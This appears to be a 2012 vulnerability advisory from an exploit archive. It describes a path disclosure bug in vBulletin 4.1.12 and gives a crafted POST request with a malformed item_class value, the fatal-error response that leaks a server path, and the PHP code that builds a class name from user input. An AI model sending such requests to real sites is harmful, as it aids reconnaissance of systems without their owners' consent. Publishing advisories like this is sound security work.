Home / exploits vBulletin 4.1.12 Path Disclosure
Posted on 08 June 2012
[ TITLE ....... ][ vBulletin 4.1.12 - information disclosure for logged in users [ DATE ........ ][ 30.04.2012 [ AUTOHR ...... ][ http://hauntit.blogspot.com [ SOFT LINK ... ][ http://vbulletin.com [ VERSION ..... ][ [ TESTED ON ... ][ LAMP [ ----------------------------------------------------------------------- [ [ 1. What is this? [ 2. What is the type of vulnerability? [ 3. Where is bug :) [ 4. More... [--------------------------------------------[ [ 1. What is this? This is very nice CMS, You should try it! ;) [--------------------------------------------[ [ 2. What is the type of vulnerability? Information disclosure bug. [--------------------------------------------[ [ 3. Where is bug :) ...from Burp... POST /vb/content.php?1-the-front-page/addcontent HTTP/1.1 Host: localhost (...) contenttypeid=hello&item_type=content&item_class=HERE;]&item_id=hello&s=&securitytoken=&nodeid=hello ...from Burp... Response should be: ...from Burp... HTTP/1.1 200 OK Date: Mon, 30 Apr 2012 06:58:00 GMT Server: Apache/2.2.17 (Ubuntu) X-Powered-By: PHP/5.3.5-1ubuntu7.7 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 147 <br /> <b>Fatal error</b>: Class 'vBForum_Content_Post' not found in <b>/home/kuba/www/vb/content.php</b> on line <b>176</b><br /> ...from Burp... So line 176 (and friends): ...cut... 172 public static function create($package, $class, $contentid = false) 173 { 174 $class = $package . '_Content_' . $class; 175 176 return new $class($contentid); 177 } ...cut... [--------------------------------------------[ [ 4. More... - http://hauntit.blogspot.com - http://www.vbulletin.com - http://www.google.com - http://portswigger.net [ [--------------------------------------------[ [ Ask me about new projects @ mail. ;) ] [ Best regards [
